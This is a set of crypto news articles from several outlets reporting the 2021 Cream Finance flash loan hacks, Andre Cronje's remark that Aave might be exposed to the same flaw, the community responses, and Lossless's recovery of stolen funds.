Andre Cronje Suggests Aave Has a Major Vulnerability

Key Takeaways

  • Yearn founder Andre Cronje has suggested that Aave may suffer from the same security vulnerability that recently plagued Cream Finance.
  • An Aave community proposal meant to address some potential risks has been approved.
  • While DeFi Twitter has been rife with biting comments, positivity remains.

Share this article

Some unsavory developments between DeFi communities have occurred in the past two days; however, it might be mostly noise.

DeFi War? Not So Much

Yearn founder Andre Cronje tweeted today that Aave (TVL of over $19 billion) users are vulnerable to many of the same risks that have recently troubled other protocols. He wrote: 

“Aave core after 24 hour defamation marathon on yearn for cream being exploited, while Aave is vulnerable to the same exploit… Tell me again how much better your security is.”

Cronje appears to be referring to the most recent attack on Cream Finance, which resulted in the loss of roughly $136 million in Cream funds via a flash loan attack two days ago. In August, Cream’s protocol lost $34 million, although $17.6 million of that was returned by the hacker. Cream (TVL of $1.35 billion) is part of Yearn’s ecosystem. Yearn has a TVL of $5.8 billion. 

When asked for comment, Aave founder Stani Kulechov referred Crypto Briefing to a recent Aave Twitter thread that sheds light on the situation. Financial modeling platform Gauntlet Network issued a proposal meant to mitigate possible risk in the Aave protocol. While concerns had been raised earlier this week by Aave community members, simulations run by the Gauntlet Network suggested that such attacks would result in a net loss for the attackers. The proposal passed.

Cronje did not immediately respond to a request for comments. However, today Yearn wrote in a tweet

“Yearn devs have been in war rooms with Aave and Cream from the start working together. We are assisting with identifying and fixing several issues. If you think we are at war, throw away your newspapers.” 

Perhaps to mitigate conflict and show support, Kulechov wrote early this morning in a tweet:

“Everyone in DeFi is in the same boat. We all want to make finance more fair, transparent and impactful to empower the next wave of users. Building DeFi is hard and communities have their differences. Lets work together, support each other and most importantly win together. WGMI [heart emoji].”

WGMI is crypto slang for “we’re going to make it,” and it is in contrast to NGMI (“not going to make it”). In fact, the hacker of the recent $134 million Cream attack received a message (via a transaction) from a user called “oilysirs.eth,” warning the attacker that they “are NGMI.”

This news was brought to you by Phemex, our preferred Derivatives Partner.


Share this article


Tagged : / / / /

DeFi Platform Loses $130,000,000 in Attack That Cost Over $37,000 in Ethereum Fees

Decentralized Finance (DeFi) platform Cream Finance (CREAM) says that its lending market suffered a hack resulting in the loss of crypto assets worth approximately $130 million.

Cream Finance says in a tweet that the attacker exploited a vulnerability in the first version of the C.R.E.A.M. lending market platform.



“Our Ethereum C.R.E.A.M. v1 lending markets were exploited and liquidity was removed on October 27, 1354 UTC. The attacker removed a total of ~$130m USD worth of tokens from these markets…

No other markets were impacted.”

The attacker made away with 2760.22 Ether (ETH) and 60 other tokens of varying amounts and value, according to blockchain security firm SlowMist.

The Cream Finance says it has now fixed the vulnerability and paused activity on its Ethereum-based lending markets.

“With the help of friends from iearnfinance and others in the community, we were able to identify the vulnerabilities and patch them.

In the meantime, we’ve paused our v1 lending markets on Ethereum and we’re in the process of putting together a post-mortem review.”

According to blockchain security firm BlockSec, the attack involved several transactions and incurred total gas fees of approximately 9.16 ETH. At the time of writing, ETH is trading at around $4,150 per CoinGecko, translating to a transaction fee of about $37,556.

The total value locked on Cream Finance is currently $1.36 billion, according to analytics platform DeFi Llama.

This attack is not the first time Cream Finance has suffered a security breach resulting in the theft of funds. In late August, the platform was hacked for Ethereum and Amp (AMP) tokens worth around $26 million at the time.

Don’t Miss a Beat – Subscribe to get crypto email alerts delivered directly to your inbox

Follow us on Twitter, Facebook and Telegram

Surf The Daily Hodl Mix




Disclaimer: Opinions expressed at The Daily Hodl are not investment advice. Investors should do their due diligence before making any high-risk investments in Bitcoin, cryptocurrency or digital assets. Please be advised that your transfers and trades are at your own risk, and any loses you may incur are your responsibility. The Daily Hodl does not recommend the buying or selling of any cryptocurrencies or digital assets, nor is The Daily Hodl an investment advisor. Please note that The Daily Hodl participates in affiliate marketing.

Featured Image: Shuttertock/sdecoret


Tagged : / / / / / / / / / /

Crypto Hackers Steal Over $130M from Cream Finance DeFi Platform

Cream Finance decentralized lending platform has been hacked, with attackers stealing more than $130 million worth of funds through a large flash loan attack.

PeckShield blockchain data analytic firm first identified the large flash loan transaction that the hackers used to exploit the Cream Finance platform.

The affected funds were mostly Cream liquidity provider tokens (Cream LP tokens) as well as other Ethereum-based tokens (ERC-20 tokens).

According to blockchain records, the hackers moved $92 million worth of funds into one address while $23 million into another address and also transferred other funds into other addresses. It now appears that the attackers have moved the funds to different wallets.

Following the incident, the price of Cream token plunged, from $152 to $111 in minutes, a 27% drop, according to CoinGecko.

According to the exploit transaction, the attacker left some strange message. They wrote, “gÃTµ Baave lucky, iron bank lucky, cream not. ydev : incest bad, don’t do.” This appears to refer to DeFi lending platforms Aave, Iron Bank, and Cream Finance.

This is the third time Cream Finance has faced a severe hack. In February, Cream Finance lost $37.5 million after hackers took advantage of a vulnerability in instant or flash credits technology.

In August, the primary decentralized finance protocol also lost $18.8 million after unknown hackers drained funds through flash loans exploits by introducing a reentrancy bug to the Amp token. After Cream Finance identified the incident during that time, it stated that the protocol stopped the exploit by pausing supply and borrowing contracts on the Amp token.

During that incident, PeckShield stated that the hacker exploited the Amp token by reborrowing assets during its transfer before updating the first to borrow in 17 separate transactions.

Calls for More Investor Protections

Flash loans allow users to borrow funds without collateral because the lender expects the money to be returned within one transaction block, immediately. However, hackers have used this loophole in DeFi to steal millions of dollars.

As reported by Blockchain.News in August, Poly Network DeFi protocol was attacked and hackers stole $600 million worth of funds from the protocol. This is considered the largest hack in DeFi and cryptocurrency history.

Decentralized Finance (DeFi), which is one of the use cases of blockchain technology, has been on the cusp of major growth. Regulators are aware of this growth and, of late, have been moving to act accordingly.

Frequent hacks like the abovementioned incidents have prompted regulators to call for better consumer protection in the DeFi sector.

In August, US SEC chairman Gary Gensler made it clear that regulation of DeFi platforms and stablecoins is on the SEC’s agenda. During that time, Gensler compared the use of DeFi to the Wild West, emphasizing it needs better investor protection.

Image source: Shutterstock


Tagged : / / /

$136M Lost as Cream Finance Suffers Another Flash Loan Attack

Share this article

Decentralized lending protocol Cream Finance has been hit by a major flash loan attack. The assailant borrowed $2 billion from Aave and made off with over $130 million worth of Ethereum-based tokens.

Cream Finance Hit By Another Flash Loan Attack

Cream Finance has been exploited. 

An attacker successfully used a flash loan earlier today to borrow 524,102.159 ETH from Aave, worth about $2 billion at today’s prices. They then successfully drained Cream Finance of several DeFi tokens, making off with around $136 million at peak prices according to Zerion. The transaction for the attack cost $36,574.34 and can be viewed on Etherscan.

The smart contract auditing firm PeckShield broke the news of the attack on Twitter this afternoon, while Cream Finance announced that it was “investigating an exploit on C.R.E.A.M. v1 on Ethereum.” The team added that it would share further updates as soon as they’re available. 

The Etherscan transaction history shows that the attacker moved at least $92 million to one Ethereum wallet and $23 million to another. The stolen funds were mostly comprised mainly of Cream LP tokens, which can be earned for providing liquidity to the protocol, as well as XSUSHI, WNXM, YFI, and several other ERC-20 tokens and stablecoins. 

In the input data for the transaction, the attacker left the following message:

“gÃTµ Baave lucky, iron bank lucky, cream not. ydev : incest bad, dont do”

The message likely refers to Cream Finance’s Iron Bank, which Alpha Finance uses in partnership with Cream. Alpha Finance posted an update confirming that Iron Bank and its Alpha Homora V2 product were “safe” following the attack. Yearn Finance also posted an update confirming that its products have not been affected and its team was “assisting Cream with investigation of the exploit.”

Interestingly, the wallet containing the majority of the attacker’s stolen funds received a transaction from a user with the Ethereum Name Service domain oilysirs.eth following the attack. The transaction contained a message that warned the attacker that they “are NGMI” because they “will never be able to cash that amount out.” “NGMI” is a popular meme in the crypto community. It’s typically used as an insult, meaning “Not Going to Make It.”

Following the attack, crypto investor and researcher Adam Cochran noted that Cream’s staked Ethereum 2.0 service is custodial, suggesting that users may be reimbursed for the stolen Cream LP tokens.

SIMETRI Research
Sanctor Turbo Demo Day

The attacker also used the DeFi exchange aggregator ParaSwap to convert tokens like AAVE and PERP for ETH and USDC. They also used Ren’s bridge to move over $1 million into BTC.

The total value locked on the protocol has shrunk by 72%, while the price of Cream’s native governance token CREAM has plummeted by around 27%, trading at $114 at the time of writing.

Notably, this isn’t the first time Cream Finance has been hit by a severe attack. The protocol lost $34 million in a similar exploit only in August, though the attacker later returned a portion of the funds. 

Editor’s note: This is a developing story and will be updated as details emerge. 

Disclosure: At the time of writing, the author of this feature owned ETH and xSUSHI. 

This news was brought to you by ANKR, our preferred DeFi Partner.

Share this article


Tagged : / / / /

DeFi security project ‘Lossless’ helps recover $16.7M from Cream Finance hack

Lossless, a decentralized finance, or DeFi, security outfit has assisted in the recovery of 5,152.6 Ether (ETH) siphoned during the Cream Finance exploit that occurred in August.

Tweeting on Monday, Lossless identified white hat security expert Pascal Caversaccio as being pivotal to the successful recovery of the siphoned funds.

As previously reported by Cointelegraph, DeFi lending protocol, Cream Finance suffered a flash loan attack to the tune of $19 million in ETH and Amp tokens back in August. Following the exploit, Cream stated that it would repay the siphoned funds via fees collected on the protocol to compensate affected users.

Detailing the asset retrieval process, Lossless stated that it used its extensive connections within the world of hackers to enable the return of the funds taken during the flash loan attack.

Commenting on the recovery process, Dominykas A. van Otterlo, chief business development officer at Lossless told Cointelegraph:

“We managed to track down the hacker manually and retrieve the stolen funds for CREAM Finance. You could say it was sort of cyber detective work, not an easy task. Thanks to Pascal Caversaccio, one of our white hat hackers, who helped us to track down the hacker.”

Lossless also stated that the project is looking to launch a hack mitigation tool that will allow protocol developers to adopt a “hands-on” approach to preventing such malicious exploits of their platform.

Part of this mitigation will reportedly include a 24-hour freeze on suspicious transactions to allow time for robust investigations.

According to van Otterlo, Lossless is leveraging the project’s knowledge-base acquired while manually tracking down hackers. Lossless plans to offer security support for DeFi projects across the Ethereum, Polygon, and Binance Smart Chain networks as well as plans for deployment on layer-two protocols.

Related: The perfect storm: DeFi hacks will advance the crypto sector moving forward

According to a Cream Finance statement from Oct. 1, Lossless and Caversaccio earned the 50% bug bounty from the successful fund recovery. “This is our first recovery of such scale,” Lossless tweeted in response to Cream Finance’s announcement.

DeFi platforms continue to fall victim to hackers and opportunistic profiteers who take advantage of vulnerabilities in smart contract codes to siphon funds from these projects.

Indeed, in August, Poly Network suffered a massive $610 million hack across multiple networks. The entity responsible did eventually return the stolen funds but the incident offered a pointer to the security loopholes prevalent in the DeFi space.

DeFi projects continue to offer bug bounties to white hat hackers to discover vulnerabilities that escaped the code auditing process. In September, white hat programmer Alexander Schlindwein reportedly received $1.05 million in bug bounty payments from Belt Finance.